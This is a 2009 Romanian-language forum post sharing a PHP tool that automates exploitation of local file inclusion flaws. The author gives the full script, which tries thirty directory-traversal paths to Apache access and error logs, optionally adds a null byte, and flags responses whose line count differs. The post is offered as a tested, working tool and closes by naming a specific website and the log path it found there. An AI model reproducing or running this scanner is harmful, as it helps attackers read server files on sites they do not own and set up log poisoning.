crs12decoder Posted March 3, 2009 Report Posted March 3, 2009 [edit] i-am facut si o interfata htmlam facut un checker pentru fisierele log pt LFI. Ca sa nu le mai cauti manual.L-am pus sa incerce fiecare link in parte si sa numere liniile de cod...(sunt sanse mici sa fie acelasi nr de linii de cod in logfile ca in celelalte pagini). Cand gaseste fisierul .log vi-l afiseaza cu bold, va afiseaza liniile, si link-ul catre fisierAm pus si optiune pt folosirea nullbyte-ului (%00).Introduceti link-ul radacina vulnerabil la LFI ex "http://www.pagina.com?pagina=".Si setati daca sa foloseasca sau nu nullbyte adica %00 ala de la sfarsit.Scriptu' e testat de mine si merge.. ..aici cod:<form action="" method="post">link:<input type="text" name="link"><br>nullbyte:<input type="checkbox" name="check">(%00)<br><input type="submit" name="submit" value="submit></form><?phpif(isset($_POST['submit'])){if (isset($_POST['check'])){$nullbyte=1;}else{$nullbyte=0;}$link = $_POST['link'];$array = array(1 => '../apache/logs/error.log',2 => '../apache/logs/access.log',3 => '../../apache/logs/error.log',4 => '../../apache/logs/access.log',5 => '../../../apache/logs/error.log',6 => '../../../apache/logs/access.log',7 => '../../../../../../../etc/httpd/logs/acces_log',8 => '../../../../../../../etc/httpd/logs/acces.log',9 => '../../../../../../../etc/httpd/logs/error_log',10 => '../../../../../../../etc/httpd/logs/error.log',11 => '../../../../../../../var/www/logs/access_log',12 => '../../../../../../../var/www/logs/access.log',13 => '../../../../../../../usr/local/apache/logs/access_log',14 => '../../../../../../../usr/local/apache/logs/access.log',15 => '../../../../../../../var/log/apache/access_log',16 => '../../../../../../../var/log/apache2/access_log',17 => '../../../../../../../var/log/apache/access.log',18 => '../../../../../../../var/log/apache2/access.log',19 => '../../../../../../../var/log/access_log',20 => '../../../../../../../var/log/access.log',21 => '../../../../../../../var/www/logs/error_log',22 => '../../../../../../../var/www/logs/error.log',23 => '../../../../../../../usr/local/apache/logs/error_log',24 => '../../../../../../../usr/local/apache/logs/error.log',25 => '../../../../../../../var/log/apache/error_log',26 => '../../../../../../../var/log/apache2/error_log',27 => '../../../../../../../var/log/apache/error.log',28 => '../../../../../../../var/log/apache2/error.log',29 => '../../../../../../../var/log/error_log',30 => '../../../../../../../var/log/error.log');$counter=count(file($link.$array[1]));for ($i=1; $i<=30; $i++){if ($nullbyte==1){$array[$i]=$array[$i].'%00';}$fcounter=count(file($link.$array[$i]));echo $i.') ';if($counter!=$fcounter){echo "<b>".$fcounter." = ".$link.$array[$i].'</b>';}else{echo $fcounter." = ".$link.$array[$i];;}echo "<br>";}}?>pt russpry link-ul cu logfile-u l-a gasit ca fiind http://www.russpry.com/index.php?page=../../../../../../../etc/httpd/logs/error_log%00 Quote